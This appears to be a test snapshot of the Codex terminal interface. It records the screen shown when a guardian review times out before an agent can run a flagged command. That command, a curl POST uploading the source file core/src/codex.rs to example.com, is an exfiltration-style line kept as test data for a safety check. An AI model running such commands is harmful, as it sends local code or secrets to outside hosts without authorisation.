codex-rs/tui/src/chatwidget/snapshots/codex_tui__chatwidget__tests__app_server_guardian_review_timed_out_renders_timed_out_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---







✗ Review timed out before codex router could run curl -sS -i -X POST --data-bin
  ary @core/src/codex.rs https://example.com

• Working (0s • esc to interrupt)


› Ask Codex Router to do anything

  gpt-5.5 default · /tmp/project
